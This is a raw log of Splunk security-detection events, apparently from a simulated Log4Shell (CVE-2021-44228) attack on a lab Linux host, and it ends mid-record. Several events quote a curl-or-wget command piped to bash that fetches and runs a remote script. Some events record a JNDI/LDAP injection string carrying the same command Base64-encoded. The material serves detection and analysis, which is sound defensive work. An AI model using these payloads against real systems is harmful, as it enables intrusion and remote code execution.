dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644252, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", 
http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the log4j package; its invocation looks like `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644254, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.AE", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="T1190", annotations._all="Command and Control", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use LDAP servers in organizations. Outbound LDAP traffic should not be allowed through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space. Note that addresses may be logged in IPv4-mapped IPv6 form (0:0:0:0:0:ffff:a00:110 in this event is 10.0.1.16, which is inside RFC1918 space); normalize such addresses before applying the private-range exclusion, otherwise internal connections like this one can be scored as if they were external.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644254, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.AE", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="T1190", annotations._all="Command and Control", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="T1059", 
annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use LDAP servers in organizations. Outbound LDAP traffic should not be allowed through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space. Note that addresses may be logged in IPv4-mapped IPv6 form (0:0:0:0:0:ffff:a00:110 in this event is 10.0.1.16, which is inside RFC1918 space); normalize such addresses before applying the private-range exclusion, otherwise internal connections like this one can be scored as if they were external.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644252, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", 
risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use log4j have a web component and are especially targeted by this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a JNDI/LDAP lookup in the log4j package; its invocation looks like `${jndi:ldap://PAYLOAD_INJECTED}`, and when executed against vulnerable web applications the invocation can be seen in various parts of web logs. Specifically, it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema-accelerated searching, mainly because the second part of the detection is fairly heavy: it runs a regex across all _raw events that looks for the `${jndi:ldap://` pattern across all potential web fields available in the raw data, such as HTTP headers. Note that this literal pattern will not match obfuscated variants (for example nested `${lower:l}`-style lookups) or other JNDI schemes such as rmi:// or dns://, so the absence of a match is not evidence that no attempt was made. 
If you see results for this detection, it means that there was an injection attempt, which could be reconnaissance activity or a genuine exploitation attempt, but it does not necessarily mean that the host was successfully exploited. When the payload carries a Base64 segment (as in the src field of this event), decode it to see the command the attacker intended to run, and correlate with endpoint and outbound LDAP detections to confirm impact.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool 